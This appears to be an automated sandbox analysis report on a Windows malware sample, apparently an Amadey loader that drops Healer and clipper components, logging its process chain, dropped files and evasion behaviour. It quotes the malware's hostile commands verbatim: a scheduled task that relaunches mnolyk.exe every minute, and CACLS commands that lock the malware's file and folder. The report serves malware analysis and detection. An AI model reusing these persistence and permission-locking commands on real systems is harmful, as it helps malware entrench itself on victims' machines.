                          Source: file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeBinary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs file.exe
                          Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\afCf.exe.logJump to behavior
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@38/14@0/1
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB3FEF CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,GetLastError,FormatMessageA,0_2_00EB3FEF
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 6_2_00007FFC9D7D1A1D ControlService,ChangeServiceConfigA,6_2_00007FFC9D7D1A1D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB4FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00EB4FE0
                          Source: file.exeReversingLabs: Detection: 66%
                          Source: file.exeVirustotal: Detection: 48%
                          Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /E
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /E
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00EB1F90
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00941F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00941F90
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00EB597D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,2_2_004019F0
                          Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_01
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:408:120:WilError_01
                          Source: C:\Users\user\Desktop\file.exeCommand line argument: Kernel32.dll0_2_00EB2BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCommand line argument: Kernel32.dll1_2_00942BFB
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCommand line argument: 08A2_2_00413780
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: wextract.pdb source: file.exe, bfCg.exe.0.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: file.exe, 00000000.00000003.250463432.0000000000D6E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.250204509.0000000004A2A000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000002.318652229.000000000138E000.00000002.00000001.01000000.00000009.sdmp, xriv.exe, 0000000B.00000003.316310103.0000000001682000.00000004.00000020.00020000.00000000.sdmp, xriv.exe, 0000000B.00000000.315748298.000000000138E000.00000002.00000001.01000000.00000009.sdmp, mnolyk.exe, 0000000C.00000002.775000934.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000000C.00000000.318162039.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000000.329735996.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000013.00000002.332650893.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000000.352215568.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 00000019.00000002.352736386.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000000.478701407.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001C.00000002.479552852.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000002.607657638.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001E.00000000.607327719.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000000.735938171.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe, 0000001F.00000002.736512930.00000000009AE000.00000002.00000001.01000000.0000000A.sdmp, mnolyk.exe.11.dr, xriv.exe.0.dr
                          Source: Binary string: Healer.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: wextract.pdbGCTL source: file.exe, bfCg.exe.0.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D86000.00000004.00000020.00020000.00000000.sdmp, nika.exe, 00000006.00000000.290177703.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, nika.exe.1.dr
                          Source: Binary string: _.pdb source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: C:\wevepipes\ho.pdb source: bfCg.exe, 00000001.00000003.250816625.0000000004D49000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000000.250999613.0000000000401000.00000020.00000001.01000000.00000005.sdmp, afCf.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: rundll32.exe, 00000016.00000002.775107488.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmp, clip64[1].dll.12.dr, clip64.dll.12.dr
                          Source: Binary string: Healer.pdbH5 source: afCf.exe, 00000002.00000003.263047220.00000000008AF000.00000004.00000020.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289378130.00000000026B1000.00000004.00000800.00020000.00000000.sdmp, afCf.exe, 00000002.00000002.289207500.0000000002270000.00000004.08000000.00040000.00000000.sdmp, afCf.exe, 00000002.00000002.288764062.00000000020D0000.00000004.00000020.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeUnpacked PE file: 2.2.afCf.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeUnpacked PE file: 2.2.afCf.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB724D push ecx; ret 0_2_00EB7260
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_0094724D push ecx; ret 1_2_00947260
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0041C40C push cs; iretd 2_2_0041C4E2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00423149 push eax; ret 2_2_00423179
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0041C50E push cs; iretd 2_2_0041C4E2
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_004231C8 push eax; ret 2_2_00423179
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0040E21D push ecx; ret 2_2_0040E230
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0041C6BE push ebx; ret 2_2_0041C6BF
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0067C125 push ebx; ret 2_2_0067C126
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0066E484 push ecx; ret 2_2_0066E497
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0067BE73 push cs; iretd 2_2_0067BF49
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0067BF75 push cs; iretd 2_2_0067BF49
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_0085C693 push edi; retf 2_2_0085C694
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeCode function: 2_2_00859748 push FFFFFFE1h; ret 2_2_00859757
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_01377D26 push ecx; ret 11_2_01377D39
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 11_2_0136F748 push E8FFFFFBh; iretd 11_2_0136F74D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00EB202A
                          Source: nika.exe.1.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]

                          Persistence and Installation Behavior

                          barindex
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000D1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000CBA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000C.00000002.775069911.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeFile created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\clip64[1].dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EB1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00EB1AE8
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\bfCg.exeCode function: 1_2_00941AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_00941AE8

                          Boot Survival

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\afCf.exe TID: 3804Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe TID: 3868Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332Thread sleep count: 64 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 1332Thread sleep time: -1920000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6028Thread sleep time: -50000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6044Thread sleep count: 52 > 30Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe TID: 6044Thread sleep time: -9360000s >= -30000sJump to behavior
